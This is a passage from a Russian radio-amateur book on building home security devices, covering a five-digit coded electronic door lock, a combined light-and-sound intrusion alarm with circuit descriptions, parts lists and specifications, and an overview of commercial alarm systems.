При сборке внахлест пластины чередуются так, чтобы у соседних пластин разрезы были с разных сторон сердечника. Сборка внахлест уменьшает магнитное сопротивление магнитопровода, но усложняет сборку и разборку трансформатора. Начинающим радиолюбителям рекомендуется изготавливать магнитопровод методом шихтования из пластин электротехнической стали, если нет готового витого ленточного магнитопровода.
Самодельный трансформатор содержит три обмотки:
одну первичную, рассчитанную на напряжение 220 В переменного тока, и две вторичные обмотки, необходимые для получения заданного уровня выпрямленного напряжения постоянного тока. На вторичных обмотках сетевого трансформатора действует переменное напряжение 4...5 В при холостом ходе.
Сетевой трансформатор обеспечивает полную гальваническую развязку вторичных цепей электронной схемы устройства от сети переменного тока и надежную защиту и электробезопасность при наладке и регулировке. Рекомендации по технологическим операциям изготовления трансформатора в домашней мастерской рассмотрены выше, в них особое внимание обращается на сопротивление изоляции.
На выводах вторичных обмоток сетевого трансформа тора собран выпрямитель, на выходе которого действуем напряжение постоянного тока 5 В. Выпрямитель работает на емкостный фильтр, выполненный на оксидных конденсаторах. В данном устройстве для преобразования напряжения применена однофазная двухполупериодная мостовая схема, она имеет как положительные, так и отрицательные характеристики, которые ранее отмечались при рассмотрении подобных охранных устройств.
Выпрямитель собран на четырех диодах VD1—VD4 малой мощности, средний прямой ток которых не менее 1 А, а импульсное прямое напряжение — не менее 600 В. В качестве выпрямителя может быть применен блок или сборка диодов, выполненных в единой конструкции, например КЦ402А. Основным преимуществом данного выпрямителя по сравнению с другими схемами является большая частота пульсации, что позволяет уменьшить емкость конденсатора фильтра и габариты сетевого трансформатора. Преимущество мостовой схемы в том, что вторичная обмотка трансформатора питания имеет вдвое меньшее число витков, чем при двухфазной схеме, хотя для двухфазной схемы понадобится только два диода. Однофазный выпрямитель по мостовой схеме из всех вариантов двухполупериодных выпрямителей обладает наилучшими технико-экономическими показателями. Режим работы выпрямителя определяется в основном типом фильтра, включенного на его выходе. Емкостные фильтры применяются в выпрямителях, рассчитанных на малые токи нагрузки.
Конденсатор фильтра включается параллельно нагрузке для уменьшения пульсации выпрямленного напряжения. Реакция нагрузки на выпрямитель зависит от емкости конденсатора, сопротивление которого для переменной составляющей много меньше сопротивления нагрузки.
Напряжение постоянного тока, сглаженное емкостным фильтром, подается на простейший стабилизатор напряжения, собранный на транзисторе VT1 и стабилитроне VD5. Стабилизатор напряжения автоматически поддерживает постоянство напряжения на нагрузке с заданной точностью. Транзисторный стабилизатор напряжения содержит параметрический стабилизатор,
собранный на кремниевом стабилитроне и регулирующий транзистор средней мощности. Применение мощного транзистора позволяет получить гораздо больший выходной ток, чем только от параметрического стабилизатора с таким же стабилитроном.
Следует заметить, что примененный стабилизатор напряжения, отличаясь предельной простотой, обладает существенным недостатком: даже при кратковременном коротком замыкании в нагрузке регулирующий транзистор выходит из строя. По этой причине, а также учитывая низкое значение коэффициента стабилизации и относительно большое выходное сопротивление, в схеме можно применить стабилизатор с двумя транзисторами и защитой от перегрузок.
Стабилизаторы напряжения постоянного тока с двумя транзисторами различной структуры, приведенные на рис. 2.19, имеют примерно на порядок более высокие значения коэффициента стабилизации и на порядок меньше значения выходного сопротивления, чем стабилизатор, примененный в схеме на рис. 2.16. И одновременно стабилизаторы, изображенные на рис. 2.17, можно сделать нечувствительными к коротким замыканиям и перегрузкам, добавив диод и резистор, обозначенные на схемах штриховыми линиями.
Рекомендованную замену схемы стабилизатора напряжения могут выполнить более опытные радиолюбители. При этом транзистор VT1 можно монтировать на радиаторе охлаждения без изоляционных прокладок, если в стабилизаторе по схеме на рис. 2.19, а, с корпусом устройства соединен положительный полюс стабилизированного напряжения, а в устройстве по схеме на рис. 2.19, б,— отрицательный полюс. Например, использован стабилитрон Д814В (Д810) и применены транзисторы VT1 типа П214, VT2 — МП38А (рис. 2.19, а) или транзисторы VT1 — П702, VT2 — МП40 (рис. 2.19, б);
R1 — МЛТ-0,25-560 Ом.
В данном устройстве в качестве ИМ может быть использован электромагнит или соленоид, показанный на рис. 2.12. Обмотка содержит 4000 витков провода марки ПЭВ-2 диаметром 0,41 мм. Подвижной сердечник соленоида должен свободно перемещаться в катушке.
Кодозадающее устройство с дешифратором включает в свой состав четыре триггера, собранных на элементах микросхемы DA1.1 с выводами 1, 2 и 3; DA1.2 с выводами
Рис. 2.19. Принципиальные схемы стабилизаторов напряжения:
а — на транзисторах р-n-р-структуры: б — на транзисторах n-р-n-структуры.
4, 5 и 6; DA2.1 с выводами 1, 2 и 3; DA2.2 с выводами 4, 5 и 6; DA3 с выводами 1, 2 и 3; DA3.2 с выводами 4, 5 и'б; DA4.1 с выводами 1, 2 и 3; DA4.2 с выводами 3, 4 и 5; четыре элемента совпадения, собранные на DA1.4 с выводами 11, 12 и 13; DA2.4 с выводами 11, 12 и 13;
DA3.3 с выводами 8, 9 и К); DA4.3 с выводами 8, 9 и 10; дешифратор, который содержит девять переключателей S3—S11; кодозадающий узел, собранный на электрических соединителях Х2—Х27; транзисторный ключ на тринисторе VS1 и транзисторе VT2.
Контакты переключателя S2, устанавливаемого на охраняемом объекте в исходном состоянии устройства при закрытой двери, разомкнуты. В этом положении на всех четырех выводах триггеров (вывод 6) действует высокий уровень логической единицы, а на базе транзистора
VT2 будет напряжение низкого уровня; транзисторный ключ закрыт, электромагнит и индикаторная лампа H1 находятся в обесточенном состоянии.
Для работы охранного устройства применяется пятизначный шифр, который набирается с помощью установления перемычек между контактами соединителей Х2—Х27, но управление осуществляется только тремя кнопками, две из которых нажимают дважды. Первая цифра кода, например 2, получается при соединении элементов следующей электрической цепи: вывод 1 ИМС DA1, контакт электрического соединителя Х21, перемычка, контакт соединителя Х20, контакт соединителя Х4, перемычка, контакт соединителя Х5, кнопочный переключатель S4.
Следует заметить, что кнопочные переключатели S3—S11 устанавливаются на металлической плате, изготовленной из стального листа (полосы) толщиной не менее 4 мм, она закрепляется на входной двери охраняемого объекта. Все выведенные на лицевую панель кнопки обозначаются цифрами кода с 1 до 9. Около переключателя S3 необходимо нанести цифру 1, около S4 — цифру 2, около S5 — цифру 3 и т. д. Данная часть сторожевого устройства образует дешифратор, который имеет постоянное обозначение кнопок.
Если потребуется установить первую цифру кода, например 5, то необходимо образовать цепочку: вывод 1 ИМС DA1, X2I, Х20, Х10, X11, S7.
Вторая цифра кода устанавливается электрической цепочкой, состоящей из элементов: выводы 9 н 10 ИМС DA1, контакты Х23, Х22, Х2, ХЗ, S3. Эта цепочка определила вторую цифру кода — 1.
Третья цифра кода устанавливается набором электрической цепочки, состоящей из элементов: выводы 9 и 10 ИМС DA2, контакты соединителей Х23, Х22, Х16, Х15, кнопочный переключатель S10. Данная электрическая цепь позволяет набирать цифру кода 8.
Таким образом, образовав эти электрические цепи, набрано три цифры кода 218, а полный код состоит из пяти цифр. В данном устройстве к этим трем цифрам добавляются еще две цифры, уже участвующие в наборе кода, например 18, и весь код будет 21818. При дешифровании необходимо нажимать последовательно кнопки переключателей S4, S3, S10, S3, S10.
Работает охранное устройство следующим образом. После нажатия на первую кнопку, соответствующую первой цифре установленного кода, срабатывает первый триггер, переключаясь из одного крайнего состояния в другое. Напомним, что первый триггер собран на элементах ИМС DA1 (выводы: 1, 2 и 3; 4, 5 и 6). При этом напряжение высокого уровня логической единицы с вывода 3 поступает на вывод 12 элемента совпадения ИМС. DА1 (выводы 11, 12 и 13). При нажатии на кнопку S3, соответствующую следующей цифре кода, на второй вход этого элемента совпадения (вывод 13) будет подано напряжение высокого уровня логической единицы, а на выходе будет действовать низкий уровень логического нуля (вывод 11). Это состояние будет также на входе второго триггера (DA2 — выводы 1, 2 и 3; 4, 5 и 6), которое приводит к его срабатыванию, и с выхода этого триггера напряжение высокого уровня логической единицы поступает на вход следующего элемента совпадения (вывод 12 ИМС DA2). Если далее нажимать на кнопки и набирать правильный код аналогично сказанному, срабатывают элементы ИМС DA3. Сначала переключается триггер на элементах DA3.1 и DA3.2, затем через элемент совпадения (DA3.1) переключается триггер, собранный на элементах ИМС DA4 (выводы 1, 2 и 3; 4, 5 и б). На этом этапе набора цифр заканчивается первый этап работы дешифратора, который подготавливает устройство к набору пятой цифры кода.
Последовательный цикл набора ном.еров кода приводит к переключению всех четырех триггеров на один из входов элемента совпадения ИМС DA4 (вывод 11), на котором начинает действовать высокий уровень логической единицы. Такой же высокий уровень напряжения воздействует и на второй вход этого элемента (вывод 10) через резистор R4. Поэтому при наборе пятой цифры кода 8, когда на третьем входе элемента совпадения ИМС DA4 (вывод 9) также появляется напряжение высокого уровня логической единицы, на выходе этого элемента (вывод 8) будет действовать низкий уровень логического нуля. Этот уровень будет действовать также на входе инвертора, собранного на элементе ИМС DA3 (выводы 11, 12 и 13).
Инвертор, как простейшее устройство на микросхеме, преобразует сигнал низкого уровня на входе (выводы 12 и 13 ИМС DA3) в сигнал высокого уровня логической единицы и наоборот. Таким образом, на выводе 8 ИМС DA3 действует напряжение низкого уровня логического нуля. Благодаря инвертору (элемент DA3 с выводами 11, 12, 13) на базу транзистора VT2 приходит уже напряжение высокого уровня логической единицы. Это состояние приводит к открыванию транзистора VT2 и тринистора VS1. Через обмотку ЭМ1 и индикаторную лампу /// начинает протекать ток. Электромагнит срабатывает и открывает стопор защелки или оттягивает задвижку механического замка. Одновременно загорается лампа накаливания, которая подсвечивает надпись "входите".
Теперь рассмотрим вариант с неправильным набором шифра. Если в процессе набора кода нажата кнопка с цифрой, не входящей в него, то вторые входы всех ИМС DA1— DA4 (выводы 5) — входы всех четырех триггеров соединяются с общим проводом и триггеры возвращаются в исходное состояние. После этого код необходимо набирать заново. Триггеры всегда возвращаются в исходное состояние при открывании двери, так как контакты кнопочного переключателя S2 также соединены с общим проводом, который смонтирован с теми же входами триггеров.
В схему включена цепочка из резистора R3 и конденсатора С5, которая обеспечивает защиту от ложных срабатываний триггеров и ИМ. При любом появлении напряжения питания на конденсаторе С5 и зарядке его до номинального значения питания все триггеры возвращаются в исходное состояние.
При изготовлении охранного устройства, при его сборке, монтаже и регулировке использованы следующие комплектующие ЭРЭ: сетевой понижающий трансформатор питания Т1 броневой конструкции (покупной или самодельный) типа ТПП242-127/220-50; транзисторы VT1 типа КТ807Б, VT2 — МП38А; выпрямительные диоды VD1-VD4 типа Д242Б; стабилитрон VD5 типа КС156А; ИМС DA1 типа К155ЛАЗ, DA2 — К155ЛАЗ, DA3 — К155ЛАЗ, DA4 — К155ЛА4; резисторы R1 типа МЛТ-2-390 кОм, R2 — МЛТ-0,5-270 Ом, R3 — МЛТ-0,25-1 кОм, R4 — МЛТ-0,25-10 кОм, R5 — МЛТ-0,25-1 кОм, R6 — МЛТ-0,25-1 кОм, R7 — МЛТ-0,5-330 Ом; конденсаторы С1 типа МБМ-11-750В-0.05 мкФ, С2 — МБМ-11-750В-0.05 мкФ, СЗ — К50-6-16В-100 мкФ, С4 — К50-6-10В-200 мкФ, С5 — К50-6-6В-10 мкФ, С6 — К50-6-6В-10 мкФ; электрические соединители X1 типа «вилка» с электрическим кабелем в двойной изоляции; Х2—Х27 типа КМЗ-1 приборные; переключатели S1 двухпозиционный типа П2Т-1-1, S2 — самодельной конструкции, S3—S11 типа КМ1-1; плавкие предохранители F1 и F2
типа IIM-1-2 А; индикаторная лампа Н2 типа ТН-03-1;электромагнит ЭМ1 (или соленоид самодельной конструкции); тринистор VS1 типа КУ202Н.
Правильно собранное устройство, без ошибок в монтаже и из заведомо исправных комплектующих ЭРЭ, начинает работать сразу же после включения и сеть.
При сборке и ремонте охранного устройств могут быть внесены некоторые изменения в схему и заменены комплектующие ЭРЭ. Например, вместо резисторов МЛТ можно применить резисторы типов ОМЛТ, МТ, ВС, С1-4, С2-8, УДИ, БЛП; вместо конденсаторов К50-6 можно использовать конденсаторы типов К.50-3, К.50-12, К50-16, К50-20; комплект выпрямительных диодов VD1—VD4 типа Д242Б можно заменить диодными сборками типов КЦ402А, КЦ402Е или применить менее мощные выпрямительные диоды.
Конструктивно охранное устройство выполняется в виде отдельных сборочных единиц. С учетом органолентических показателей конструируется дешифратор, который укрепляется на входной двери. К этому блоку кроме эстетических предъявляются требования по устойчивости к механическим воздействиям. Дешифратор должен быть прочно укреплен на входной двери, обладать повышенной жесткостью конструкции и противостоять ударным нагрузкам.
Блок питания устройства вместе с логическими элементами изготавливается в пластмассовом или металлическом корпусе, размеры которого не превышают 140Х120Х70 мм. Элементы электроники собираются на печатной плате из фольгированного стеклотекстолита. БП устанавливается внутри охраняемого помещения в месте, которое позволяет легко обслуживать это устройство.
Основные электрические параметры и технические характеристики малогабаритного охранного устройства с дискретным управлением
Номинальное напряжение питающей сети неременного тока, В .................... .220
Номинальная частота питающей сети переменного тока, Гц ....................... .50
Номинальное стабилизированное напряжение
электропитания БЭ, В .................. .5
Коэффициент нелинейных искажений напряжения
питающей сети переменного тока, %, не более... 12
Пределы изменения напряжения питающей сети
переменного тока, В..................... 187... 242
Пределы изменения частоты питающей сети переменного тока, Гц...................... 49... 51
Пределы изменения постоянного напряжения питания БЭ, В ............ ............ .4,97...5,05
Коэффициент стабилизации, не менее .......... .70
Напряжение на выводах обмоток сетевого трансформатора питания Т1, В; под нагрузкой:
11 и 12 ............................ .2,47
13 и 14 .............. ............. .2,46
15 и 16 ............ ............ 5,0
17 и 18 .............. ............ .4,96
19 ч 20 .......................... 1,29
21 и 22 ............................ .1,28
Напряжение питания ИМ переменным током, В ... .220
Максимальная мощность, потребляемая устройством от сети переменного тока, Вт .......... .65
Количество одновременно охраняемых объектов, шт . . 1 Количество цифр в коде, шт ................ .5
Количество разрядов кодовой комбинации ....... .9
Ток, потребляемый устройством в режиме холостого хода, мА, не более .................. .25
Сопротивление изоляции токоведущих частей и элементов устройства относительно металлического корпуса и между собой, МОм, не менее ..... 10
Задержка времени срабатывания устройства при
неправильном наборе, мс ................. .0,5
Срок службы, ч, не менее .................. .5000
Вероятность безотказной работы устройства при риске заказчика в=0,9, не менее ............ .0,98
Условия эксплуатации:
температура окружающей среды, °С ........ .—25...+45
относительная влажность воздуха при температуре 25 °С, %, не более ............... .9о±3
атмосферное давление воздуха, мм рт. ст. .... .200...900
климатическое исполнение ............... . УХЛ
Рис. 2.18. Принципиальная схема малогабаритного охранного устройства с дискретным управлением.
2. 4. ЭЛЕКТРОННОЕ КОМБИНИРОВАННОЕ УСТРОЙСТВО СИГНАЛИЗАЦИИ
Для изготовления в домашней мастерской и для практического использования предлагается к рассмотрению достаточно простое УС, содержащее всего одну ИМС и три транзистора. Монтаж, регулировка и настройка этого устройства доступны подготовленному радиолюбителю.
Электронное комбинированное сторожевое устройство со световой и звуковой сигнализацией предназначено для охраны жилых, производственных и хозяйственных помещений, а также транспортных средств от несанкционированного вторжения. Оно может быть установлено на дверях, окнах, форточках, люках, крышках, капотах и т. п. Простота конструктивного и схемно-технического решений электронного комбинированного УС делает его общедоступным для тиражирования в радиолюбительских лабораториях, цехах малых предприятий и мастерских юных техников. УС может быть применено для охраны объектов на садово-огородных участках. В данном устройстве применяются комплектующие изделия и элементы общего назначения, которые имеются в торговой сети, что значительно снижает стоимость его изготовления при серийном производстве. В целом охранное устройство имеет высокие технико-экономические показатели: например, в режиме холостого хода максимальный ток, который потребляет УС, не превышает 5 мА. УС работает от сети переменного тока напряжением 220 В частотой 50 Гц, а также и от аккумуляторной батареи напряжением 12 В.
Принципиальная электрическая схема устройства со световой и звуковой сигнализацией приведена на рис. 2. 3. Как следует из данной электрической схемы, УС включает в свой состав входное устройство, сетевой понижающий трансформатор питания Т1, выпрямительное устройство с емкостным фильтром, СИП, устройство электронной сигнализации комбинированного тока и выходные сторожевые цепи.
Входное устройство обеспечивает подключение к сети переменного тока напряжением 127 или 220 В, а также к аккумуляторной батарее GB1; предохраняет УС от коротких замыканий в первичных цепях, которые часто возникают при неправильной сборке или монтаже и из-за
некачественных комплектующих ЭРЭ; сигнализирует о готовности УС к эксплуатации. На входе установлен плавкий предохранитель F1,сигнальная лампа Н1 и однополюсные переключатели В1 и В4. Подключение к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем, имеющим повышенное сопротивление изоляции. Длина кабеля колеблется в пределах от 1, 5 до 2, 3 м. Для переключения напряжения с 220 В на напряжение 127 В на входе устройства установлены два держателя предохранителя F1 (на схеме не указано), один из которых подключен к обмоткам выводов трансформатора 1 и 3, а второй — к выводам обмоток 2 и 3.
Сетевой понижающий трансформатор питания 77 изготавливается на магнитопроводе броневой конструкции типа ШЛ, Ш или УШ, имеет одну катушку с тремя обмотками, изолированными друг от друга лакотканью с повышенной электропрочностью. Катушка трансформатора устанавливается на центральном стержне магнитопровода, активная площадь поперечного сечения которого должна быть не менее 4, 5... 5 см2. Сетевой трансформатор питания обеспечивает расчетный уровень выпрямленного напряжения постоянного тока, полную гальваническую развязку вторичных цепей устройства от высокого напряжения переменного тока питающей сети, а также дополнительную электробезопасность при эксплуатации устройства, так как на вторичной обмотке трансформатора Т1 и элементах электронной схемы действует пониженное безопасное напряжение. Моточные данные самодельного сетевого понижающего трансформатора Т1 приведены в табл. 2. 6.
На выходных обмотках сетевого трансформатора Т1 в режиме холостого хода действуют переменные напряжения 6, 3 В (выводы 6 и 7) и 13, 5 В (выводы 4 и 5). Вместо самодельного трансформатора в данном УС можно применить готовый унифицированный трансформатор типов ТА, ТН, ТАН, ТПП, ТС, ТТ, например можно использовать трансформатор типа ТПП277-127/220-50.
К выводам вторичной обмотки б и 7 подключена сигнальная лампа H1 с напряжением питания 5... 6 В. К выводам 4 и 5 трансформатора подключено выпрямительное устройство, собранное по однофазной двухполупериодной мостовой схеме на четырех выпрямительных
Таблица 2. 6. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в комбинированном электронном сторожевом устройстве
диодах VD1 — VD4 и относящееся к выпрямителям нерегулируемого типа. Рассматриваемый выпрямитель, выполненный по схеме Греца, характеризуется рядом положительных и отрицательных параметров. К положительным параметрам выпрямительного устройства можно отнести повышенную частоту пульсации выпрямленного напряжения постоянного тока, более полное использование габаритной мощности трансформатора, сравнительно низкий уровень обратного напряжения на комплекте выпрямительных диодов, повышенную мощность, которую можно получить с этого выпрямителя. К недостаткам мостовой схемы относятся: значительное количество используемых выпрямительных диодов, сравнительно большая (по сравнению с другими схемами) стоимость изготовления выпрямителя, невозможность установки однотипных выпрямительных диодов на металлические радиаторы охлаждения без изоляционных прокладок, пониженное значение кпд и повышенные потери. Выпрямительные диоды в такой схеме имеют легкие условия эксплуатации, высокую надежность работы и повышенный срок службы. Работает выпрямитель Греца на емкостный фильтр, собранный на оксидных конденсаторах. Пульсации выпрямленного напряжения постоянного тока сглаживаются сначала фильтром на конденсаторах С1 и С2, а затем П-образпым фильтром, включающим в свои состав оксидные конденсаторы СЗ, С4 и резистор R2.
В схеме электронного комбинированного УС на выходе выпрямителя собран ПСН, составленный из стабилитрона VD5. балластного резистора R1 и усилителя тока, выполненного на транзисторе VT1. Стабилизатор напряжения обеспечивает на выходе постоянное стабилизированное напряжение 12В при токе нагрузки до 100 мЛ. Для увеличения мощности стабилизатора и тока нагрузки транзистор VT1 может быть заменен более мощным, например из серии К. Т608, П216.
В состав УС входят ИМС DA1, два маломощных транзистора VT3, VT2 и тиристор VD 10 (VS1). Включается устройство двумя электрическими переключателями B1 и В2. Первый выключатель подготавливает устройство к работе, о чем свидетельствует загорание сигнальной лампы H1. Выключатель В2, расположенный скрытно, включает собственно сигнальное устройство. При включении питания начинает заряжаться электролитический конденсатор С6 через резистор R4. Транзисторы в это время закрыты. ИМС, состоящая по существу из четырех полевых транзисторов с изолированным затвором, работает в ключевом режиме. При напряжении питания до 6 В эти ключи закрыты. Как только конденсатор С6 зарядится до напряжения 8 В и напряжение на затворах транзисторов микросхемы достигнет 4 В, на выводе 3 появится напряжение высокого уровня — напряжение питания. Следует заметить, что выводы 2 и 6 ИМС являются затворами полевых транзисторов, вывод 3 — истоком, 10 и 12 — стоками, 9 и 13 — затворами, 11 — изолированным затвором на общей подложке. ИМС DAI представляет собой четырехтранзисторный переключатель.
Конденсатор С6 заряжается до порогового напряжения примерно за 1, 5 мин, и за это время необходимо отключить замкнутый контакт, например дверь охраняемого объекта. Если на объекте установлено несколько скрытых выключателей, то указанное время отсчитывается от момента включения последнего переключателя. Регулировка времени срабатывания УС обеспечивается изменением номиналов электрической цепочки R4, С6.
На транзисторах VT2, VT3 собран мультивибратор, предназначенный для управления тиристором VD10 (VS1), в анодную цепь которого включают звуковой сигнализатор или несколько звуковых сигнализаторов. При включении электропитания переключателем В2 питание подается на мультивибратор. С этого момента вся система сигнализации находится в дежурном режиме работы, потребляя минимальный ток. Конденсаторы С7 и С8 пока не заряжены, а транзисторы VT2 и VT3 и тиристор VD10 (VS1) закрыты.
Переключатели S1 и S2 установлены так, что при открывании дверей или окон, где они установлены, их контакты замыкаются, и в это время вывод 9 микросхемы через электрическую цепочку R5, VD7 подключается к отрицательному полюсу источника питания. Если после открывания двери ее опять закрыть и тем самым снова замкнуть контакты кнопочного переключателя S1 или S2, конденсатор будет медленно разряжаться через резистор R4. Конденсатор С6 заряжается примерно за 2 мин, а разряжается за 1, 5 мин. После зарядки конденсатора С6 на выводе 8 ИМС DAI появляется полное напряжение питания, которое сохраняется до тех пор, пока напряжение на выводе 9 не станет меньше порогового значения. В течение 1, 5 мин тревожный сигнал будет продолжаться, хотя дверь уже закрыта.
В момент, когда на выводе 8 ИМС появляется полное напряжение, начинает заряжаться конденсатор С8 через резистор R12 и открывается транзистор VT2. Мультивибратор переходит в рабочий режим. В это же время на управляющий электрод тиристора VD10 (VSI) поступают через резистор R17 открывающие его импульсы с частотой примерно 0, 5 Гц и подаются прерывистые звуковые сигналы. Задержка времени от момента открывания двери до появления звукового сигнала равна 15... 18 с. За это время переключатель В2 переводится в положение «включено». Процесс восстановления режима сигнального устройства к повторному включению длится ориентировочно 1 мин.
При замыкании контактов S4, S5 световой и звуковой сигналы включаются практически мгновенно. При их замыкании через цепь R7, VD9 вывод 13 ИМС DAI подключается к отрицательному полюсу источника питания, появляется напряжение питания на выводе 14 ИМС и через резистор R13 заряжается конденсатор С8. В данном случае почти без задержки срабатывает мультивибратор. В это же время напряжение на конденсаторе С8 продолжает повышаться, что приводит к увеличению частоты Жуковых сигналов, которые затем сливаются в епрерывное гудение.
В УС применяются следующие комплектующие изделия и элементы: сетевой понижающий трансформатор питания Т1 броневой конструкции типа ШЛ; ИМС DA1 типа K1KТ682B; транзисторы VT1 тина КТ603Б, VT2 КТ315А, VT3 — KT361A; выпрямительные диоды VD1—VD4 типа КД105Б, VD6- VD9 — Д220;
стабилитрон VD5 тина Д814Д; тиристор VD10 (VS1) типа КУ202Н; конденсаторы С1 типа К50-3-50В-200 мкФ, С2 — К50-3-16В-100 мкФ, СЗ— К50-3-16В-200 мкФ, С4 — К50-3-16В-200мкФ, С5— К50-3-16В-10мкФ,С6— К50-3-16В-50 мкФ, С7 — К50-3-16В-20 мкФ, С8— К50-3-16В-10 мкФ, С9 — К50-3-16В-200 мкФ, С10— К10-7В-50В-Н30-3300 пФ, СИ— К50-3-25В-50 мкФ; резисторы R1 типа ВСа-0.5-470 Ом, R2 — ВСа-0,125-150 Ом, R3 — ВСа-0,125-30 кОм, R4 - ВСа-0,125-2,0 МОм, R5 — ВСа-0,125-30 кОм, R6 — ВСа-0,125-1,3 кОм, R7 — ВСа-0,125-1,3 кОм, R8— ВСа-0,125-2,0 МОм, R9 — ВСа-0,125-30 кОм, R10 — ВСа-0,125-1,3 кОм, R11 — ВСа-0,125-30 кОм, R12 — ВСа-0,125-150 кОм, R13— ВСа-0,125-100 кОм, R14 — ВСа-0,125-240 кОм, R15 — ВСа-0,125-30 кОм, R16— ВСА-0,125-50 кОм, R17— ВСа-0,125-100 Ом, R18— ВСа-0,125-100 Ом, R19 — ВСа-2-240 кОм; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной 1,5 м; плавкий предохранитель F1 типа ПМ-1-0,25 А; индикаторные лампы H1 типа МН-6,3-0,3 А, Н2—Н4— А-12; аккумуляторная батарея средней емкости GBI с номинальным напряжением постоянного тока 12 В; переключатели В1, ВЗ, В4 типа П2Т-1-1, 52, SI—S5 типа П2К; громкоговоритель ВА1 с сопротивлением обмотки около 4 Ом или телефонный капсюль динамического типа.
При монтаже, регулировке и -ремонте УС могут быть применены другие комплектующие изделия и ЭРЭ, не ухудшающие основные электрические параметры устройства и его эксплуатационные характеристики. Например, сетевой понижающий трансформатор питания T1 типа ТС-5-4 можно заменить самодельным трансформатором с характеристиками, указанными в табл. 2.6. Диоды типа КД105Б можно заменить на КД102, КД103, КД105, Д226; стабилитрон типа Д814Д — на Д813; транзистор типа КТ603Б — на КТ608, КТ815, ГТ404; тиристор типа КУ202Н — на КУ202А, КУ202Б; электролитические конденсаторы типа К50-3 — на К50-6, К50-12, К50-16, К50-20; резисторы типа ВСа — на МЛТ, МТ, ОМЛТ, ВС, УЛИ, Cl-4, C2-8.
При изготовлении устройства рекомендуется объединить БП и БЭ в единую конструкцию, выполненную в пластмассовом корпусе, на лицевой панели которого необходимо предусмотреть выводы для подключения шлейфа, внешнего автономного источника электропитания, блока громкоговорителей и датчиков, устанавливаемых на¦ входных дверях, окнах и т. д.
Монтаж всех элементов сторожевого устройства необходимо выполнять только при отключенном напряжении питания. Блоки, узлы и датчики устройства должны быть размещены в местах, защищенных от влаги, масла, ныли, высокой температуры, агрессивных паров различных жидкостей и обязательно в труднодоступных для посторонних лиц местах так, чтобы их нельзя было сразу обнаружить и вывести из строя.
Основные электрические параметры и технические характеристики электронного комбинированного сторожевого устройства
Номинальное напряжение питающей сети неременного тока, В ....................... .220 или 127
Номинальная частота питающей сети переменного тока, Гц ............................ .50
Номинальное напряжение автономного источника питания постоянного тока, В .............. .12
Пределы изменения напряжения питающей сети
переменного тока, В .................... .187...242
Пределы изменения частоты питающей сети переменного тока, Гц ..................... .49,5...50,5
Пределы изменения напряжения автономного источника питания, при которых обеспечивается устойчивая работа устройства, В .... .10...14
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12
Выходное стабилизированное напряжение для электропитания блоков устройства и подзарядки аккумуляторной батареи, В .......... .12±0,05
Коэффициент стабилизации, не менее .......... .100
Амплитуда пульсаций стабилизированного напряжения постоянного тока, мВ, не более ........ .15
Ток, потребляемый устройством от сети переменного напряжения в режиме холостого хода, мА, не более .......................... 10
Ток, потребляемый от автономного источника питания, в режиме холостого хода, мА, не более . . .5
Максимальная мощность сторожевого устройства
при включенной сигнализации, Вт .......... .35...40
Сопротивление изоляции токоведущих частей устройства относительно друг друга и металлического корпуса, МОм, не менее .......... .5
Напряжение на выводах вторичных обмоток трансформатора 77, В:
5 и б ............................ .6
7 и 8............................. 13, 5
Помехозащищенность устройства при напряженности внешнего электромагнитного ноля, дБ, не менее............................. 80
Вероятность безотказной работы устройства при Р =0, 92, не менее............... 0,97
Срок службы, ч, не менее .................. 5000
кпд, %, не менее ........................85
Рис. 2.3. Принципиальная схема комбинированного электронного устройства сигнализации.
Глава третья. Электронные и электромеханические сторожевые устройства
3. 1. ОБЩИЕ СВЕДЕНИЯ
В настоящее время некоторые промышленные производства занимаются изготовлением и установкой всевозможных сторожевых устройств различного назначения и конструктивного исполнения. Количество таких устройств сравнительно невелико, хотя и они часто повторяют друг друга по конструктивно-техническим решениям и электронным схемам. Многие сторожевые устройства, к сожалению, отличаются невысокими показателями качества и надежности и легко поддаются дешифрованию. Применяемые в подобных устройствах электронные схемы характеризуются сравнительной простотой и небольшим набором комплектующих ЭРЭ. Следует заметить, что погоня за максимальным, часто неоправданным снижением себестоимости этих изделий и получением наибольшей прибыли, которую извлекают малые, плохо оснащенные предприятия, кооперативы и т. д., делают сторожевые устройства малопригодными для выполнения своих функций. Сегодня можно встретить устройства с одним и тем же наименованием, но предназначенные для выполнения разных функций.
Много специальных устройств создано для охраны подвижных средств. Они устанавливаются на автомобили обычно частными кооперативами и мелкими акционерными обществами, которые, как правило, не несут полной ответственности за надежность и долговечность их эксплуатации. Злоумышленники легко овладевают автомашинами, оснащенными противоугонными системами низкого качества. Необходимо знать, что большинство этих изделий очень чувствительны к качеству изготовления источников питания, перепадам напряжения питающей сети, частоте и стабилизации тока.
В торговой сети в последнее время появляется все больше и больше разнообразных автономных источников питания, которые используются в качестве резервного электропитания сторожевых устройств. Некоторые фирмы рекламируют компактные и простые в эксплуатации источники питания с широким диапазоном выходной мощности от 0, 1 до 500 Вт и более и повышенным сроком службы. Например, время автономной работы аккумуляторов типа UPS PS20 при различной нагрузке и номинальной температуре окружающей среды 25 °С приведено в табл 3. 1.
Сегодня рынок насыщен новыми сторожевыми устройствами как отечественного, гак и зарубежного производства, обеспечивающими необходимое сервисное обеспечение на основе микропроцессорного управления. Но эти системы, как правило, очень дорогие и не могут быть повторены даже в хорошо оснащенных радиолюбительских лабораториях. К новым сторожевым системам можно отнести электронные устройства, датчики которых устанавливаются в охраняемых помещениях, а сигнал о несанкционированном вторжении передается от электронного блока через обычную электрическую сеть на ЦПУ, где постоянно высвечивается информация о состоянии объекта. В случае проникновения на любой из охраняемых объектов на центральном пульте возникают световой и звуковой сигналы тревоги с указанием номера помещения.
Промышленные сторожевые устройства, предназначенные для охраны банков, квартир, территорий вокруг зданий, автостоянок, оснащаются радиоэлектронными передатчиками, бесконтактными детекторами разбивания стекла, магнитными контактами, активными инфракрасными детекторами, источниками бесперебойного питания и противопожарными системами большой емкости, в том числе и адресными.
